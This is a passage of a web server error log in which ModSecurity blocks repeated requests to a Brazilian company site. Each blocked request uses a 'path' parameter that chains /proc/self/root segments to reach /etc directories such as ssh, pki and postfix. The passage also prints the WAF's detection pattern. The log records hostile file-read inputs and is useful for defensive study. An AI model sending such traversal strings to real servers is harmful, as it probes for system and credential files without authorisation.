[unique_id "abh80LysWC90G-1nBrBneQAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:37.289184 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:59810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh80Ur9dMAiw-8KANNrHAAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:38.511462 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:43138] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh80lajLEzk2WiQ-100bwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:38.560241 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:35436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh80qTCbgAP5jq5TehM5wAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:57:40.982966 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:43146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh81FajLEzk2WiQ-100dgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:42.313112 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:43160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh81o6lpbStxTqkSkuKbwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:43.209449 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:50492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh811ajLEzk2WiQ-100eAAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:57:43.507536 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:43166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh817ABkC4fWIHEf8EaRwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:44.791448 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:43168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh82M_BxrYCr4hPDw8MYwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:45.935597 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:43170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh82f9ocpUE4ed4uDwVwgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:48.345808 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:43182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh83P9ocpUE4ed4uDwVxAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:48.790175 2026] [mime_magic:error] [pid 14895:tid 140411540502272] (70014)End of file found: [client 74.7.243.203:56192] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/kbd
[Mon Mar 16 18:57:49.680314 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:40824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh83Y6lpbStxTqkSkuKcAAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:50.847053 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:40830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh83o6lpbStxTqkSkuKcwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:52.115329 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:40846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh84KTCbgAP5jq5TehM6AAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:54.367484 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:40848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh84bysWC90G-1nBrBnggAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:55.674995 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:40862] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh847ABkC4fWIHEf8EaSwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:56.843392 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:40876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh85KTCbgAP5jq5TehM6QAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:58.184181 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:59968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh85s_BxrYCr4hPDw8MbgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:59.377108 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:59972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8546lpbStxTqkSkuKdAAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:00.651741 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:59980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh86P9ocpUE4ed4uDwVxgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:03.923397 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:60004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh866TCbgAP5jq5TehM6wAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:05.619525 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:60008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh87aTCbgAP5jq5TehM7gAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
